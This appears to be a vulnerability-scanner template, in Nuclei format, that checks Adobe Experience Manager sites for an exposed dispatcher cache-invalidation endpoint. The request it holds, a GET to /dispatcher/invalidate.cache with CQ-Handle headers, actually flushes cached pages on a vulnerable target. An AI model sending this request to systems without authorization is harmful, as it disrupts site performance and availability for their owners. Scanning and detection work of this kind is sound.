id: aem-cached-pages

info:
  name: Invalidate / Flush Cached Pages on AEM
  author: hetroublemakr
  severity: low
  reference:
    - https://twitter.com/AEMSecurity/status/1244965623689609217
  tags: aem

requests:
  - method: GET
    path:
      - "{{BaseURL}}/dispatcher/invalidate.cache"
    headers:
      CQ-Handle: /content
      CQ-Path: /content
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<H1>OK</H1>"
        part: body
      - type: status
        status:
          - 200
